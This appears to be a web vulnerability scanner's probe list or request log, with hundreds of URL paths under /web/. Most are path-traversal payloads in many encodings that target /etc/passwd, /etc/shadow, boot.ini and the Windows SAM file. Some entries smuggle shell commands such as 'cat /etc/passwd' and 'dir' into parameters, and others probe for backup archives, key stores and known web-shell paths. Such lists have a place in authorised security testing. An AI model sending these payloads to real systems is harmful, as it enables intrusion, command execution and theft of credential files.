/
/web
/web*
/web.
/web../../../../../../../../../../etc/*
/web../../../../../../../../../../etc/passw*
/web/
/web/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/web/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
/web/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/web/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../boot.ini
/web/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini
/web/.%252e/.%252e/.%252e/winnt/boot.ini
/web/..%252f..%252f..%252f..%252f..%252f../windows/repair/sam
/web/..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam
/web/..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._
/web/..%255c..%255c..%255c..%255c..%255c../windows/repair/sam
/web/..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam
/web/..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._
/web/..%2F..%2F..%2F..%2F..%2F../windows/repair/sam
/web/..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam
/web/..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._
/web/..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini
/web/..%5C..%5C..%5C..%5C..%5C..%5C/winnt/win.ini
/web/................../config.sys
/web/................../etc/passwd
/web/.../.../.../
/web/.../.../.../.../.../.../.../.../.../.../etc/passwd
/web/.../.../.../.../.../.../.../.../.../boot.ini
/web/../../../../../../../../../../../../etc/shadow
/web/../../../../../../../../../../etc/passwd
/web/../../../../../../../../../boot.ini
/web/../../../../winnt/repair/sam._
/web/../../windows/dvr2.ini
/web/../config.dat
/web/../webserver.ini
/web/..\..\..\..\..\..\temp\temp.class
/web/..\\..\\..\\..\\..\\..\\..\\boot.ini
/web/.cobalt/sysManage/../admin/.htaccess
/web/.Go4RIFKD
/web/.nsf/../winnt/win.ini
/web/.P0fBZVYJ
/web///
/web////../../data/config/microsrv.cfg
/web////./../.../boot.ini
/web////////../../../../../../etc/passwd
/web///etc/hosts
/web///etc/passwd
/web//WEB-INF/web.xml
/web/1.alz
/web/1.cer
/web/1.egg
/web/1.jks
/web/1.pem
/web/1.sql
/web/1.tar
/web/1.tar.bz2
/web/1.tar.gz
/web/1.tar.lzma
/web/1.tgz
/web/1.war
/web/1.zip
/web/101.alz
/web/101.cer
/web/101.egg
/web/101.jks
/web/101.pem
/web/101.sql
/web/101.tar
/web/101.tar.bz2
/web/101.tar.gz
/web/101.tar.lzma
/web/101.tgz
/web/101.war
/web/101.zip
/web/168.alz
/web/168.cer
/web/168.egg
/web/168.jks
/web/168.pem
/web/168.sql
/web/168.tar
/web/168.tar.bz2
/web/168.tar.gz
/web/168.tar.lzma
/web/168.tgz
/web/168.war
/web/168.zip
/web/192.168.1.101.alz
/web/192.168.1.101.cer
/web/192.168.1.101.egg
/web/192.168.1.101.jks
/web/192.168.1.101.pem
/web/192.168.1.101.sql
/web/192.168.1.101.tar
/web/192.168.1.101.tar.bz2
/web/192.168.1.101.tar.gz
/web/192.168.1.101.tar.lzma
/web/192.168.1.101.tgz
/web/192.168.1.101.war
/web/192.168.1.101.zip
/web/192.168.1.alz
/web/192.168.1.cer
/web/192.168.1.egg
/web/192.168.1.jks
/web/192.168.1.pem
/web/192.168.1.sql
/web/192.168.1.tar
/web/192.168.1.tar.bz2
/web/192.168.1.tar.gz
/web/192.168.1.tar.lzma
/web/192.168.1.tgz
/web/192.168.1.war
/web/192.168.1.zip
/web/192.168.alz
/web/192.168.cer
/web/192.168.egg
/web/192.168.jks
/web/192.168.pem
/web/192.168.sql
/web/192.168.tar
/web/192.168.tar.bz2
/web/192.168.tar.gz
/web/192.168.tar.lzma
/web/192.168.tgz
/web/192.168.war
/web/192.168.zip
/web/192.alz
/web/192.cer
/web/192.egg
/web/192.jks
/web/192.pem
/web/192.sql
/web/192.tar
/web/192.tar.bz2
/web/192.tar.gz
/web/192.tar.lzma
/web/192.tgz
/web/192.war
/web/192.zip
/web/192168.alz
/web/192168.cer
/web/192168.egg
/web/192168.jks
/web/192168.pem
/web/192168.sql
/web/192168.tar
/web/192168.tar.bz2
/web/192168.tar.gz
/web/192168.tar.lzma
/web/192168.tgz
/web/192168.war
/web/192168.zip
/web/1921681.alz
/web/1921681.cer
/web/1921681.egg
/web/1921681.jks
/web/1921681.pem
/web/1921681.sql
/web/1921681.tar
/web/1921681.tar.bz2
/web/1921681.tar.gz
/web/1921681.tar.lzma
/web/1921681.tgz
/web/1921681.war
/web/1921681.zip
/web/1921681101.alz
/web/1921681101.cer
/web/1921681101.egg
/web/1921681101.jks
/web/1921681101.pem
/web/1921681101.sql
/web/1921681101.tar
/web/1921681101.tar.bz2
/web/1921681101.tar.gz
/web/1921681101.tar.lzma
/web/1921681101.tgz
/web/1921681101.war
/web/1921681101.zip
/web/192_168_1_101.alz
/web/192_168_1_101.cer
/web/192_168_1_101.egg
/web/192_168_1_101.jks
/web/192_168_1_101.pem
/web/192_168_1_101.sql
/web/192_168_1_101.tar
/web/192_168_1_101.tar.bz2
/web/192_168_1_101.tar.gz
/web/192_168_1_101.tar.lzma
/web/192_168_1_101.tgz
/web/192_168_1_101.war
/web/192_168_1_101.zip
/web/3rdparty/phpMyAdmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../
/web/3rdparty/phpmyadmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../
/web/3rdparty/phpMyAdmin/export.php?what=../../../../../../../../../../../../etc/passwd%00
/web/3rdparty/phpmyadmin/export.php?what=../../../../../../../../../../../../etc/passwd%00
/web/?pattern=/etc/*&sort=name
/web/admin-serv/tasks/configuration/ViewLog?file=passwd&num=5000&str=&directories=admin-serv%2Flogs%2f..%2f..%2f..%2f..%2f..%2f..%2fetc&id=admin-serv
/web/admin.cgi
/web/admin.nsf
/web/admin/browse.asp?FilePath=c:\&Opt=2&level=0
/web/admin/contextAdmin/contextAdmin.html
/web/admin4.nsf
/web/admin5.nsf
/web/administrator.cgi
/web/albums/userpics/Copperminer.jpg.php?cat%20/etc/passwd
/web/aspnet_client
/web/assets/mobirise/css/meta.php?filesrc=
/web/atomicboard/index.php?location=../../../../../../../../../../etc/passwd
/web/authLogin.cgi
/web/Autodiscover/
/web/Autodiscover/Autodiscover.xml
/web/autohtml.php?op=modload&mainfile=x&name=/etc/passwd
/web/axis-cgi/buffer/command.cgi
/web/axis/services/Version?xsd=../../../../../../../../../../../etc/passwd
/web/axis2/services/Version?xsd=../../../../../../../../../../../etc/passwd
/web/backup.alz
/web/backup.cer
/web/backup.egg
/web/backup.jks
/web/backup.pem
/web/backup.sql
/web/backup.tar
/web/backup.tar.bz2
/web/backup.tar.gz
/web/backup.tar.lzma
/web/backup.tgz
/web/backup.war
/web/backup.zip
/web/banner.cgi
/web/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1
/web/basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=sec&password=secu
/web/bb-hist.sh
/web/bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
/web/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
/web/blazeds/messagebroker/http
/web/blazeds/messagebroker/httpsecure
/web/boilerplate.asp?NFuse_Template=.../.../.../.../.../.../.../.../.../boot.ini&NFuse_CurrentFolder=/
/web/book.cgi
/web/bytehoard/index.php?infolder=../../../../../../../../../../../etc/
/web/ca/..\\..\\..\\..\\..\\..\\..\\..\\winnt/\\win.ini
/web/ca/..\\..\\..\\..\\..\\..\\/\\etc/\\passwd
/web/ca//\\../\\../\\../\\../\\../\\../\\windows/\\win.ini
/web/cfappman/index.cfm
/web/cfdocs/exampleapp/docs/sourcewindow.cfm?Template=c:\boot.ini
/web/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini
/web/cfdocs/examples/cvbeans/beaninfo.cfm
/web/cfdocs/examples/parks/detail.cfm
/web/cfdocs/expeval/exprcalc.cfm?OpenFilePath=c:\boot.ini
/web/cfdocs/snippets/viewexample.cfm
/web/cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Fping.exe%20127.0.0.1
/web/cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%69%6E%64%6F%77%73%2Fping.exe%20127.0.0.1
/web/cgi-bin/pfdisplay.cgi?../../../../../../etc/passwd
/web/cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\windows\win.ini
/web/cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\win.ini
/web/cgiinfo.cgi
/web/cgitest.py
/web/cgi_wrapper
/web/clientaccesspolicy.xml
/web/cloud/data/htaccesstest.txt
/web/cloud/data/owncloud.db
/web/cloud/data/owncloud.log
/web/cms/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00
/web/conspass.chl+
/web/consport.chl+
/web/contact.cgi
/web/content/base/build/explorer/none.php?..:..:..:..:..:..:..:etc:passwd:
/web/content/base/build/explorer/none.php?/etc/passwd
/web/count.cgi
/web/courier/intermediate_login.html
/web/crossdomain.xml
/web/current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
/web/current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1
/web/data/htaccesstest.txt
/web/data/owncloud.db
/web/data/owncloud.log
/web/dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
/web/default.asp
/web/default.aspx
/web/default.htm
/web/default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
/web/defaultwebpage.cgi
/web/desktopmodules/feedbackdesigner/ajaxfbs/browser.html
/web/directory.php?dir=%3Bcat%20/etc/passwd
/web/docs/showtemp.cfm?TYPE=JPEG&FILE=c:\boot.ini
/web/DomainFiles/*//../../../../../../../../../../etc/passwd
/web/domcfg.nsf
/web/download.cgi
/web/dswsbobje/services/Version?xsd=../../../../../../../../../../../etc/passwd
/web/ECP
/web/ecp
/web/edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd
/web/entropysearch.cgi
/web/env.cgi
/web/environment.cgi
/web/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
/web/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini
/web/EWS
/web/EWS/Exchange.asmx
/web/EWS/Services.wsdl
/web/Exchange
/web/ext.ini.%00.txt
/web/ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1
/web/ezmlm-browse
/web/favicon.gif
/web/favicon.ico
/web/favicon.png
/web/favicons/favicon.gif
/web/favicons/favicon.ico
/web/favicons/favicon.png
/web/fi?/etc/passwd
/web/file/../../../../../../../../etc/
/web/flex2gateway/
/web/flex2gateway/amf
/web/flex2gateway/amfpolling
/web/flex2gateway/cfamfpoolling
/web/flex2gateway/http
/web/flex2gateway/httpsecure
/web/FormMail-clone.cgi
/web/formmail.cgi
/web/forum/bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
/web/forum/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
/web/gallery/index.php?include=../../../../../../../../../etc/passwd
/web/general.chl+
/web/Go4RIFKD
/web/Go4RIFKD.
/web/Go4RIFKD.asp
/web/Go4RIFKD.cfg
/web/Go4RIFKD.cfm
/web/Go4RIFKD.CGI
/web/Go4RIFKD.cgi
/web/Go4RIFKD.class
/web/Go4RIFKD.dll
/web/Go4RIFKD.dpgs
/web/Go4RIFKD.EXE
/web/Go4RIFKD.exe
/web/Go4RIFKD.htm
/web/Go4RIFKD.html
/web/Go4RIFKD.htw
/web/Go4RIFKD.idc
/web/Go4RIFKD.ini
/web/Go4RIFKD.jsp
/web/Go4RIFKD.ncf
/web/Go4RIFKD.php
/web/Go4RIFKD.phtml
/web/Go4RIFKD.xml
/web/Go4RIFKD._
/web/Go4RIFKD/
/web/guestbook.cgi
/web/GW5/GWWEB.EXE?HELP=bad-request
/web/GWWEB.EXE?HELP=bad-request
/web/help/../../../../../../../../../../../../../../../../etc/shadow
/web/helpdesk.cgi
/web/horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00
/web/host-manager/contextAdmin/contextAdmin.html
/web/htdocs/../../../../../../../../../../../etc/passwd
/web/iissamples/exair/search/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
/web/iissamples/exair/search/search.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
/web/iissamples/issamples/fastq.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
/web/iissamples/issamples/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
/web/iissamples/sdk/asp/docs/codebrws.asp
/web/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp
/web/iissamples/sdk/asp/docs/Winmsdp.exe
/web/iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp
/web/images
/web/images/?pattern=/etc/*&sort=name
/web/imcws/services/Version?xsd=../../../../../../../../../../../etc/passwd
/web/index
/web/index.action
/web/index.asp
/web/index.aspx
/web/index.cfm
/web/index.cgi
/web/index.do
/web/index.htm
/web/index.html
/web/index.jhtml
/web/index.jsp
/web/index.php
/web/index.php3
/web/index.php4
/web/index.php5
/web/index.php7
/web/index.php?
/web/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc
/web/index.php?download=/etc/passwd
/web/index.php?download=/windows/win.ini
/web/index.php?download=/winnt/win.ini
/web/index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd
/web/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc
/web/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd
/web/index.php?page=../../../../../../../../../../boot.ini
/web/index.php?page=../../../../../../../../../../etc/passwd
/web/index.php?|=../../../../../../../../../etc/passwd
/web/index.pl
/web/index.shtml
/web/index.xml
/web/info.cgi
/web/info.sh
/web/internal.sws?.../.../.../.../.../.../.../.../winnt/win.ini
/web/internal.sws?../../../../../../../../winnt/win.ini
/web/jamdb/
/web/jk-manager/contextAdmin/contextAdmin.html
/web/jk-status/contextAdmin/contextAdmin.html
/web/jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../boot.ini
/web/jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../etc/passwd
/web/junk988.aspx
/web/junk999.asp
/web/k/home?dir=/&file=../../../../../../../../etc/passwd&lang=kor
/web/kboard/
/web/krysalis/
/web/lcds-samples/messagebroker/http
/web/lcds-samples/messagebroker/httpsecure
/web/lcds/messagebroker/http
/web/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/jabber/comment2.jse+/system/autoexec.ncf
/web/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../system/autoexec.ncf
/web/lists/admin/
/web/loadpage.cgi
/web/logbook.pl?file=../../../../../../../bin/cat%20/etc/passwd%00|
/web/login.action
/web/login.asp
/web/login.aspx
/web/login.cgi
/web/login.php
/web/login.pl
/web/magento/magmi-importer/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility
/web/magento/magmi-importer/web/download_file.php?file=../../../../../../../../../../../etc/passwd
/web/magento/magmi-importer/web/download_file.php?file=../../app/etc/local.xml
/web/magento/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility
/web/magento/magmi/web/download_file.php?file=../../../../../../../../../../../etc/passwd
/web/magento/magmi/web/download_file.php?file=../../app/etc/local.xml
/web/magmi-importer/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility
/web/magmi-importer/web/download_file.php?file=../../../../../../../../../../../etc/passwd
/web/magmi-importer/web/download_file.php?file=../../app/etc/local.xml
/web/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility
/web/magmi/web/download_file.php?file=../../../../../../../../../../../etc/passwd
/web/magmi/web/download_file.php?file=../../app/etc/local.xml
/web/manager/contextAdmin/contextAdmin.html
/web/Mem/dynaform/FileExplorer.htm
/web/messagebroker/http
/web/Meuhy.php
/web/Microsoft-Server-ActiveSync
/web/Microsoft-Server-ActiveSync/default.css
/web/Microsoft-Server-ActiveSync/default.eas
/web/mlog.html
/web/mlog.phtml
/web/modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../../../../etc/passwd
/web/modules/bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
/web/modules/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
/web/msadc/Samples/selector/showcode.asp?source=/msadc/Samples/../../../../../../../../../winnt/win.ini
/web/mujVV.htw
/web/mylog.html?screen=/etc/passwd
/web/mylog.phtml?screen=/etc/passwd
/web/netget?sid=user&msg=300&file=../../../../../../../../../../etc/passwd
/web/netget?sid=user&msg=300&file=../../../../../../../../../boot.ini
/web/nikto-test-eTAKrR1n.html
/web/nikto-test-XiA9WMTx.html
/web/nonexistent.nsf
/web/nph-showlogs.pl?files=../../../../../../../../etc/&filter=.*&submit=Go&linecnt=500&refresh=0
/web/nph-showlogs.pl?files=../../../../../../../../etc/passwd&filter=.*&submit=Go&linecnt=500&refresh=0
/web/null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full
/web/OAB
/web/opendir.php?/etc/passwd
/web/opendir.php?requesturl=/etc/passwd
/web/OpenFile.aspx?file=../../../../../../../../../../boot.ini
/web/OWA
/web/OwnCloud/data/htaccesstest.txt
/web/ownCloud/data/htaccesstest.txt
/web/owncloud/data/htaccesstest.txt
/web/OwnCloud/data/owncloud.db
/web/ownCloud/data/owncloud.db
/web/owncloud/data/owncloud.db
/web/OwnCloud/data/owncloud.log
/web/ownCloud/data/owncloud.log
/web/owncloud/data/owncloud.log
/web/ows/restricted%2eshow
/web/P0fBZVYJ
/web/P0fBZVYJ.asp
/web/P0fBZVYJ.aspx
/web/P0fBZVYJ.bat
/web/P0fBZVYJ.bat|dir
/web/P0fBZVYJ.cfm
/web/P0fBZVYJ.cgi
/web/P0fBZVYJ.chl+
/web/P0fBZVYJ.dat
/web/P0fBZVYJ.exe
/web/P0fBZVYJ.htm
/web/P0fBZVYJ.idc
/web/P0fBZVYJ.ini
/web/P0fBZVYJ.php
/web/P0fBZVYJ.SSIFilter
/web/P0fBZVYJ.sys
/web/P0fBZVYJ.xml
/web/P0fBZVYJ._
/web/P0fBZVYJ/
/web/page.cgi?../../../../../../../../../../etc/passwd
/web/pathtest.pl
/web/php
/web/php-cgi
/web/php.cgi
/web/php.fcgi
/web/php/mlog.html
/web/php/mlog.phtml
/web/php/mylog.html?screen=/etc/passwd
/web/php/mylog.phtml?screen=/etc/passwd
/web/php/php.exe?c:\boot.ini
/web/php/php.exe?c:\winnt\boot.ini
/web/php4
/web/php5
/web/phpBB/bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
/web/phpBB/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
/web/phpMyAdmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../
/web/phpmyadmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../
/web/phpMyAdmin/export.php?what=../../../../../../../../../../../../etc/passwd%00
/web/phpmyadmin/export.php?what=../../../../../../../../../../../../etc/passwd%00
/web/phpping/index.php?pingto=www.test.com%20|%20dir%20c:\\
/web/phprocketaddin/?page=../../../../../../../../../../boot.ini
/web/phprocketaddin/?page=../../../../../../../../../../etc/passwd
/web/phptonuke.php?filnavn=/etc/passwd
/web/phpwebfilemgr/index.php?f=../../../../../../../../../etc
/web/phpwebfilemgr/index.php?f=../../../../../../../../../etc/passwd
/web/pls/sample/admin_/help/..%255cplsql.conf
/web/pma/db_details_importdocsql.php?submit_show=true&do=import&docpath=../
/web/pma/export.php?what=../../../../../../../../../../../../etc/passwd%00
/web/postnuke/bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
/web/postnuke/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
/web/postnuke/html/bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
/web/postnuke/html/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
/web/PowerShell
/web/printenv
/web/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
/web/prxdocs/misc/prxrch.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
/web/PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd
/web/put/cgi-bin/putport.exe?SWAP&BOM&OP=none&Lang=en-US&PutHtml=../../../../../../../../etc/passwd
/web/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
/web/restore_config.cgi
/web/ROADS/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00
/web/robots.txt
/web/Rpc
/web/ruby.rb
/web/samples/messagebroker/http
/web/samples/messagebroker/httpsecure
/web/scgi-bin/platform.cgi
/web/scripts/cphost.dll
/web/scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini
/web/scripts/samples/details.idc
/web/scripts/samples/search/qfullhit.htw
/web/scripts/samples/search/qsumrhit.htw
/web/scripts/tools/getdrvrs.exe
/web/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/vmware/hostd/vmInventory.xml
/web/search
/web/search.cgi
/web/search?NS-query-pat=../../../../../../../../../../etc/passwd
/web/search?NS-query-pat=..\..\..\..\..\..\..\..\..\..\boot.ini
/web/server.php
/web/services/Version?xsd=../../../../../../../../../../../etc/passwd
/web/servlet/allaire.jrun.ssi.SSIFilter
/web/servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../boot.ini%00
/web/servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../etc/passwd%00
/web/shop/magmi-importer/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility
/web/shop/magmi-importer/web/download_file.php?file=../../../../../../../../../../../etc/passwd
/web/shop/magmi-importer/web/download_file.php?file=../../app/etc/local.xml
/web/shop/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility
/web/shop/magmi/web/download_file.php?file=../../../../../../../../../../../etc/passwd
/web/shop/magmi/web/download_file.php?file=../../app/etc/local.xml
/web/shop/member_html.cgi?file=;cat%20/etc/passwd|
/web/shop/member_html.cgi?file=|cat%20/etc/passwd|
/web/shop/normal_html.cgi?file=../../../../../../etc/issue%00
/web/shop/normal_html.cgi?file=;cat%20/etc/passwd|
/web/shop/normal_html.cgi?file=|cat%20/etc/passwd|
/web/shoutbox.php?conf=../../../../../../../etc/passwd
/web/site.alz
/web/site.cer
/web/site.egg
/web/site.jks
/web/site.pem
/web/site.sql
/web/site.tar
/web/site.tar.bz2
/web/site.tar.gz
/web/site.tar.lzma
/web/site.tgz
/web/site.war
/web/site.zip
/web/site/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00
/web/Sites/Knowledge/Membership/Inspired/ViewCode.asp
/web/Sites/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
/web/Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp
/web/Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
/web/Sites/Samples/Knowledge/Push/ViewCode.asp
/web/Sites/Samples/Knowledge/Search/ViewCode.asp
/web/SiteServer/Publishing/ViewCode.asp
/web/siteserver/publishing/viewcode.asp?source=/default.asp
/web/splashAdmin.php
/web/srvstatus.chl+
/web/ssdefs/
/web/sshome/
/web/ssi/envout.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\
/web/status
/web/support/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd
/web/sysinfo.pl
/web/test
/web/test-cgi
/web/test-cgi.pl
/web/test.cgi
/web/test.cgi.php
/web/test.py
/web/test.sh
/web/test_cgi.php
/web/test_cgi.pl
/web/tiki/
/web/tiki/tiki-install.php
/web/tmUnblock.cgi
/web/typo/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00
/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini%00
/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts%00
/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00
/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/HASH(0x55b0d4c55ed0)%00
/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/HASH(0x55ea1212ed30)%00
/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini%00
/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/winnt/win.ini%00
/web/typo3/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00
/web/uname.cgi
/web/us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini
/web/v2/_catalog
/web/viewcvs.cgi
/web/viewimg.php?path=../../../../../../../../../../etc/passwd&form=1&var=1
/web/viewpage.php?file=/etc/passwd
/web/view_source.jsp
/web/WEB-INF./web.xml
/web/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility
/web/web/download_file.php?file=../../../../../../../../../../../etc/passwd
/web/web/download_file.php?file=../../app/etc/local.xml
/web/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD=
/web/webadmin.nsf
/web/webcalendar/forum.php?user_inc=../../../../../../../../../../etc/passwd
/web/webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif
/web/webMathematica/MSP?MSPStoreID=..\..\..\..\..\..\..\..\..\..\boot.ini&MSPStoreType=image/gif
/web/WebServiceImpl/services/Version?xsd=../../../../../../../../../../../etc/passwd
/web/Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html
/web/welcome
/web/whois.cgi
/web/wordpresswp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_addgallery_page/static/jquery.filetree/connectors/jqueryFileTree.php
/web/wordpresswp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts
/web/wordpresswp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts
/web/wordpresswp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts
/web/wordpresswp-license.php?file=/
/web/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_addgallery_page/static/jquery.filetree/connectors/jqueryFileTree.php
/web/wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts
/web/wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts
/web/wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts
/web/wp-license.php?file=/
/web/ws/services/Version?xsd=../../../../../../../../../../../etc/passwd
/web/wx/s.dll?d=/boot.ini
/web/[SecCheck]/..%252f..%252f../ext.ini
/web/[SecCheck]/..%255c..%255c../ext.ini
/web/[SecCheck]/..%2f../ext.ini
/web/~bin
